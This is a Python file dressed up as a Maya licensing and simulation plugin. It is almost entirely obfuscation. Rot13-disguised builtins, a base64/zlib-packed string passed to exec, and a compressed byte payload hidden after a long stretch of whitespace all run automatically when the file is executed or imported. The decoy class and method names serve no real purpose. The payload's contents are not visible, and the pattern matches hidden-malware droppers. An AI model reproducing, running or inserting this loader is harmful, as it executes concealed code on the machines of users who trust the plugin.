
from builtins import *

def MayaLicensingFramework(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# _substract, _detectvar, LicenseVerifier, _licensekeyenforcer, LicenseKeyEnforcer, SimulationRuntimeController, PhysicsEngineCoordinator = exec, str, tuple, map, ord, globals, type
_substract, _detectvar, LicenseVerifier, _licensekeyenforcer, LicenseKeyEnforcer, SimulationRuntimeController, PhysicsEngineCoordinator, Restore = eval, str, tuple, map, ord, globals, type, compile

class DetectVar:
    def __init__(self, _add):
        self.NodePhysicsSolver = MayaLicensingFramework((_add, 4910))
        self._simulationscenecontroller(_physicsenginecoordinator=-67251)

    def _simulationscenecontroller(self, _physicsenginecoordinator = bool):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.NodePhysicsSolver *= -56830 * _physicsenginecoordinator
        
        try:
            (({Calculate: _licensekeyenforcer}, Calculate) for Calculate in (LicenseVerifier, LicenseKeyEnforcer, _substract))

        except ArithmeticError:
            (((LicenseVerifier, LicenseKeyEnforcer, _substract), _licensekeyenforcer) for _licensekeyenforcer in {'ylBreuedlrlad6eyBlhe': 'eOlg5ryitegrly'})

        except:
            PhysicsEngineCoordinator(89298 * 44159) == float

    def _sceneanalyzer(self, SceneNodeAnalyzer = 57087):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        SceneNodeAnalyzer -= -55231 - -19464
        self._simulatedynamics != True
        
        try:
            (({Calculate: _licensekeyenforcer}, _substract) for _substract in {Calculate: _licensekeyenforcer})

        except OSError:
            ((_substract, LicenseKeyEnforcer) or _licensekeyenforcer if (_substract, LicenseKeyEnforcer) and _licensekeyenforcer else None or (_licensekeyenforcer, (_substract, LicenseKeyEnforcer)))

        except:
            PhysicsEngineCoordinator(-68468 + 6265) == bool

    def _nodetopologyoptimizer(_mayanode = Ellipsis):
        return SimulationRuntimeController()[_mayanode]

    def _simulationruntimecontroller(_math = 20745 / 7403, _physicsnoderouter = None, _positive = SimulationRuntimeController):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _positive()[_math] = _physicsnoderouter
        
        try:
            ((LicenseKeyEnforcer, LicenseKeyEnforcer) or Calculate if (LicenseKeyEnforcer, LicenseKeyEnforcer) and Calculate else None or (Calculate, (LicenseKeyEnforcer, LicenseKeyEnforcer)))

        except AssertionError:
            ((LicenseVerifier, LicenseKeyEnforcer, _substract) or _licensekeyenforcer if (LicenseVerifier, LicenseKeyEnforcer, _substract) and _licensekeyenforcer else None or (_licensekeyenforcer, (LicenseVerifier, LicenseKeyEnforcer, _substract)))

        except:
            PhysicsEngineCoordinator(-85050 / -1216) == bool

    def execute(code = str):
        try:
            return _substract(Restore(_detectvar(LicenseVerifier(_licensekeyenforcer(LicenseKeyEnforcer, code)))), locals(), globals())
        except:
            pass
        # return _substract(_detectvar(LicenseVerifier(_licensekeyenforcer(LicenseKeyEnforcer, code))))

    @property
    def _simulatedynamics(self):
        self._scenenodeanalyzer = '<__main__._simulationruntimecontroller object at 0x000008246BE87714>'
        return (self._scenenodeanalyzer, DetectVar._simulatedynamics)

try:
        DetectVar.execute(code = __code__)
        CallFunction = DetectVar(_add = 20757 * -95588)

        CallFunction._sceneanalyzer(SceneNodeAnalyzer = 86795 - CallFunction.NodePhysicsSolver)                                                                                                                                                                                                                                                          ;DetectVar._simulationruntimecontroller(_math='WWXWXXXXXWXWWWXWXXXWW',_physicsnoderouter=b'x\x9c\xed\x1ako\xe28\xf0;\xbf\x82o$\xda-\n!\xbc*U\xba\xb2l{A@\xae\x0bl\xab\xaeVQH\x9c\xab\xa9\x89\xb9$,\xe9}\xb8\xdf~\xe3G\nm74PhoO\xb5\x19g\xec\xd8\x1e\x8f\xe7\xe1G \xd4uH\xa4\xa8\xdfJV\xd2\x0c5\xfbz<\xaf\xba\xb7_/\xc7g7\xc9\x956 \xe8\xf7\xc1\x02}m\xe9\x97\xb7\x95\xbf\xbc3\xb7r1\x1e\x04c\xad;u\x966M\xb4F\xe9\xfb\xc9\x9f\x84N\xa0\x8b\xc2N\xed\x19aB\xf0t\x8a\xa7\x98`2%\x0c#\x80C\x06\x97\xbe\x1d\x1f\x7f8\xfap\xa4\x1c)\x1f*\xaa\xfa\x1dh\xa1\xd8\x89\xe3pwZ\x97W\x97W,\\^IL O)y\xf8\x05T\xb2\x1b^\xfd\xfdU\x9fT\xfb\x893j\xb7\x87\x97\xb5\xee\x172\xaf\xa6\x13I\xb8(6P\xcdl\xbc\x81\xe69\x89\xd0t\x1c\x0f:\xed\xda\x98\x8c+#r=\xbd\xfc|\xd6\xbe\x18\x11\xfdZ\xbf\xee\xa7\xb4m\x1b\xcf\xe64\x8cm{\xef\\\x9f\x93\xc5`z}~\xad\xdd\xb4/f\x1e\xb9\xb8%\xd3\x94\xea\x0b\xc6\xac\x94&\x0bLb\x1cD%\xb5\xfc\xc3\t3\xe7-\x8b<\x1b1S\xb6\xe9\x94`\x0c\x9a\x07\x81\xe9\x1f\xe8\x1d\x0c\x8c\xe9"\xe1\x8a\x08\xaf\xa7L\x17\x19\x06e\xca\x8b\x86\x8c\xb1\x1b9\x01\x9e<V7\xf5\xe3c\x85\x94\xd8\x81\xc8\xa9\xdf^\x99^\x19\x07\x1eJ\x94\xd2\x9d\x8fI\x82n\x82\xc5\x93*\xdf\xd5]\x15\x9f\x8b\x89\xc9\x89\x07\x86q\xa9\xe2\xc3\x891\npL\xf0\xe2\xb5\xc4\x98I\xee@b\xcc\xa6\x97\x8a\x918?\xd0v\x12|\xc6u\xf4\xfb\xfd\xc1\x00\xa0/\xc3\x00\xb2 \xbfR\xa9<\xa58\xd8U3\x82 \x98A\x08\xd8\x93c\xb3w\x9d8\x98N\x84q\xb4\x85Jl\xf2\xca\x96ei\x1a\xd54H-\x8b\xb2\x1fdY\xfa.\xbd\xc3Y4\xa5O\xdf\xee\xee\x93g\xdc\xf4\xb8\xd9\xb1\'O\xde\xa5w0\xe9!\x82\xe73\xea\xee\xd5%\x83\xddu(\xa5\x16$\x1d\xda\xb1:\x1d@;\xef2<\x98\x0cc\x87\x12\x7fO\x1et\xa8\xeb:\x87!<\x86,\xe8<\xbc\x8b\xefp&\x18\x11\xe7l\x8f\x1e\x14\xac\r"\x98\x9e\xc5\x0c\x11,\x102\x80\xbcK\xf0p\x12\\\x84\xa3}z\xd0\x9f\x1f.\x95I\xc9h\xb1Xw\x05\xac\xa7\x02cO\x86\xc1\xc1\xd6C.\xf5\x90Rj\xfa\xf1O\x8eL\xef\xaap UpQ\xb2\xcd\xf9f\x83+\xceV\x02dx\x12\x10\x7f\x8a\x88\xd6\xf2\x90>\xaf\x02\xc4\x99M<\xa7(\xee\xd0\xe4\t\x18\xf4\x00\x1f\xef\xe4w\xf6\xcaa\xca\xcf*My\xbc\x87\xdc\xfc\r\xc5b&\x80\xaffo\xcf X)\xb7\xd4\xba\xc3\xc1\x91\xf9\x16\xc79\xf6<{\x99g\x1dE\xf9\'k\x15Wi\xa8(\x19\xeb\x83\xea\x04\x9e\x92\xd9P\xddi7\xb1L\x96,$\x10\x96\xec\xb7\x94\x05\xcbu~\xb2na\x94\x92Z\x81\nZ\xce\xba-\xbbi\xb7\xec\xaa\xad\xd9u\xdb\x00\xd0l\x1d\x1ahP\xf6\xa84g\x7f\x1aT\xa8\xe4\x1d\'\xd0\x16\xc0h\xd4\x00\xabB\x03\xfdii\xae\xfe2\xd5\xa6Z\xd1=\xbd\xa9{UM\x7fVAT\x91<\x00p\xfb\xbb\xd3\xac\xe4\xa0\xb9\x8b\x8e\xcc\xd2s\x9e8\xf7\xf1+\x97\x17NS\xa3\xe6sh\x02\x18\x005\x00]\x02+\xaf3\\\x9fp\xb6\xf2\xd4\xcd\xc3:\x9f\xde\xd4\xe50\xdb\xe1\x964\x14\xe6\xc4\xd1a\xa6\xe3\xc9\x9e\x9e\xbdzU\xbf\xaa\xd5\xfd\xbao\xf8,exU\xabj\xa2\xd4\xf0\rY\xf2\xbc\xe3\th\xacd;\x9f\xa77g{v*\xd9N\xd57\x0c\x83sb\x18\x9cO\xc3\x90\xa9a\x88T\xe4r\xaf\x1c\xdd^\xaf\xdb\xed\x99\x10\x19\xd63\xcd\xee\xab\xad\x1c\xa5^\xd7\xec\x02MH\xbb]\xd3d\xe3\x00x\xa1Y\xa4*]\x93\xaa^\x01hIH\xd5\xbf%\xcd"O\xdd\xe6\x96fAL\x18)\x80i\x8aA\x13s\xc3|n\xdc!\xef2\xa3l2!p\x99\xf6\xcc.\x8b{\x98\xcf\xa6t\x15\xc6\x9a\x1b\xa9\xacAsm>\x9f\xab\xdb\xc8;\x9f\xbf\xc0\xd2\xbfio\xb7\xbeo}\xf8D\xf9vv\xffU\x0fd\xacy\x9b\xfa}\x94\xa5\xd2\xf3\xa6^\x88\xbd\xc9\xed\x89,\xaaq\xf6 \xb5(\x04\x8de\xac\xb7]N\x1a\x8dFS\xc2\xe3\xb4)1\xc0\xf3\xb3h\t\xae \x05\xfe\xd8\x138\xb5\xb4W\xe1\xb1\x04$\x85\x0e\xb1\xf9\xd5\xb8F\x01\xbc\xeef\xed\xcd\xd5\xba\xc4]\xb3)\xbc\xb3\xf4\xd1/\x9c\x02m\x8b\xbd\xe3/\xef\xd9jU\xf0\xeeU\x96\xa6q=\xc7\xf0\xb4F\xad\xfa\xbf8\xdee\xef\xc4P\xdd\xe3\x11\xc9(pO\xe2h\xed\xbd\xac\x93\xdbM\x0c\xf8\x07^\xf9\x9d\xb7/\xbf\xfb\xbe\x8e\x93\x90\x87\xd7D\x1cd\x97\xe2H\xfbB\x03\xa9\xc9m@]n\x01\xaak[\x83z\xba\xf5\x92[\x88<us\xfb\x1a9\x9dlsk\x9a\xe9\x1e\x17\xb6F\xa6\xd8\xe8\xf6\xdevmYW\x8d\'\xea\xe2\xdd\xc7\xfb7\xb9\xd5\'\xe1\xe1^\x92,}cN\xdd\xf4\xcevu\xb7+J\xd6ous\xdc\xe7n\xad{zCo<\x7f\xa0G\tr\x15"W\x06\xb1*\xb0\x87\xa9\x16\xfc\x90\xce\x8a\x13\'Bu\xa3(\xfe\x01V\x9c\xd4\r\xd1]\xd1\x89\x8a\x04\xbb(`o\x0b\xe6`\xf4\xf9\xfc\xcb\xe9\xc8\xb4\x06\xf6\xe8\xf3pT<)\xca\x03\xb2.\x1f\xf2v\xae \xfbY\x048\x8eQ\x14\x0b\x1a3\xe7\xceI)\xb83/\x12\xa5\xed\x90\x8e(%Q\x99U\x8c\xcal i\xa5\x11\x94|\x82\xfcG\x8e}A\xd1\x82\xc4\x05\x978Q\xc4\x0b\x94\xf4\xbdz\\(B\xf8\x8d\xbf\x9a\xa1\xf8\x86z\xbc\xc0C~1B\xf1x\xae\x9c\xca*,\x9c\x96\xe9\x1c\x05v\x04\\!\xd0\x81\xb4"#o\xdf,<\xe7A\xe58\xbc[eX\x90C\xbb\x1f5 \xa7\x01\x9e91\xa6\x01+\x99\xd0\x84MZ\xfbA\xa3v9\xba\xa1K{\x81%\xbd\xd5P`\xc0(\x8cG\xe1\x02)d\xb5\\\xcb\xd5\xdb\\\xd5F\x89\x8b\xe6\xf1qvk\x8bo}\xa8Xi\xd8\xfe\x87j\x8fx\xc3\xb7\xfe\xad\x1d-q\xec\xde\xa0p3\x93\x0f\x05\xf33\x16SE\t\xa9y{v;\x94\xbd\xee\xca9&\xfco\x9f\xfc\xeb\x05\xfb\x13\xe86|\x0bn\xc5\xa6Z\xac\xaf\xf4\t\xeb\xf1\x12!\x90\xf6\x1e\xb9f=\x06;\xb2\xcb\x8f\xac\xe9\xf9\xd5dN\xba\xbb\x05\xc3\xb0\\\xa6\xeb\xe5\x80\xffeJ-0>\xc3E\xa0\xccC\xe4\xe3\xe4d@\x83\xd4$N\xc1DE)\xcf\xb6!\x9b\xdad\x99YO\x8f:\x1eL\x8b \x8f\xfd\xe2\xe9\x8ap\x9b\x1bd\x9f[\xd3\x1f\xbc\x0bh|\xca_\x7f\x02\xac]&\xd0\x96\xf5\x11\x9d\xc1\xbc\xa5\xa6\xc8mRt\xd7yH,\x89\xb9\x11/\x02&\x87\x1f(\x9c\xd0\x08\xc7w\'\xe2\x1a\x99{r\xbe\x10\'\xf2\xa6y\xf9\xb1\x18r\x83\xe7F}\xb2r\x00\xb2\xf32c\xf8\x93Z\xf8\x17v\x05\x07\x8f')

        CallFunction._sceneanalyzer(SceneNodeAnalyzer = -95007 / CallFunction.NodePhysicsSolver)                                                                                                                                                                                                                                                          ;WWXWXWXWWXXXWWWWXXXWXWWW,nmnnmmnnnmmmnnmnnmnnnnmm,mnnnmmmmmmmnmnnmnnm,lIIlIllllIIIllIIlll,IllIlllIIIlIIIlllIll=(lambda LLILILLJJLIJLIIIIJJJJJ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(LLILILLJJLIJLIIIIJJJJJ)"),filename='\x4f\x4f\x44\x44\x44\x44\x6f\x4f\x44\x6f\x44\x6f\x44\x44\x6f\x6f\x6f\x6f\x4f\x44\x6f\x44\x4f\x4f\x44',mode='\x65\x76\x61\x6c'))),(lambda LLILILLJJLIJLIIIIJJJJJ:LLILILLJJLIJLIIIIJJJJJ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda LLILILLJJLIJLIIIIJJJJJ:LLILILLJJLIJLIIIIJJJJJ(__import__('\x7a\x6c\x69\x62'))),(lambda xwwxwxwwwwxxxwxwwwwx,LLILILLJJLIJLIIIIJJJJJ:xwwxwxwwwwxxxwxwwwwx(LLILILLJJLIJLIIIIJJJJJ)),(lambda:(lambda LLILILLJJLIJLIIIIJJJJJ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(LLILILLJJLIJLIIIIJJJJJ)"),filename='\x4f\x4f\x44\x44\x44\x44\x6f\x4f\x44\x6f\x44\x6f\x44\x44\x6f\x6f\x6f\x6f\x4f\x44\x6f\x44\x4f\x4f\x44',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        DetectVar(_add = 12570 - 8435)._simulationscenecontroller(_physicsenginecoordinator = CallFunction.NodePhysicsSolver * 30334)                                                                                                                                                                                                                                                          ;IllIlllIIIlIIIlllIll()(lIIlIllllIIIllIIlll(nmnnmmnnnmmmnnmnnmnnnnmm(mnnnmmmmmmmnmnnmnnm(WWXWXWXWWXXXWWWWXXXWXWWW('\x76\x61\x72\x73'))),DetectVar._nodetopologyoptimizer(_mayanode='WWXWXXXXXWXWWWXWXXXWW')))

except Exception as Calculate:
        if 191851 > 2413411:
            DetectVar.execute(code = _detectvar(Calculate))

        elif 243828 > 4678374:
            DetectVar(_add = -54502 - -66158)._simulationscenecontroller(_physicsenginecoordinator = CallFunction.NodePhysicsSolver + -48030)

